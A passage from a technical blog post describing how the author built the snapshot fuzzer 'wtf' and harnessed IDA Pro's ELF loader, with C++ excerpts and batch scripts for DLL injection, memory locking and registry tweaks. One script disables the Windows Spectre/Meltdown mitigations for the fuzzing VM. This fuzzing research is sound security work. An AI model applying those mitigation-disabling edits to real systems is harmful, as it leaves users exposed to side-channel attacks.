      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure.

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding out those it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem.

This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above as well as virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call let's say fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained because memory is lazy on Windows. The page fault is expected to be invoked and it will fix the PTE itself and execution carries. Because we are doing the memory write ourselves, it means that we don't generate a page fault and so the page fault handler doesn't get invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, below is the V-Tune hotspot analysis report for the below invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

vtune

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults than actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though. Filling the address space with int3s and lazily populating code leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag, let's say a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv.

I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways.

I haven't run into this bug with the latest version of IDA yet which was nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

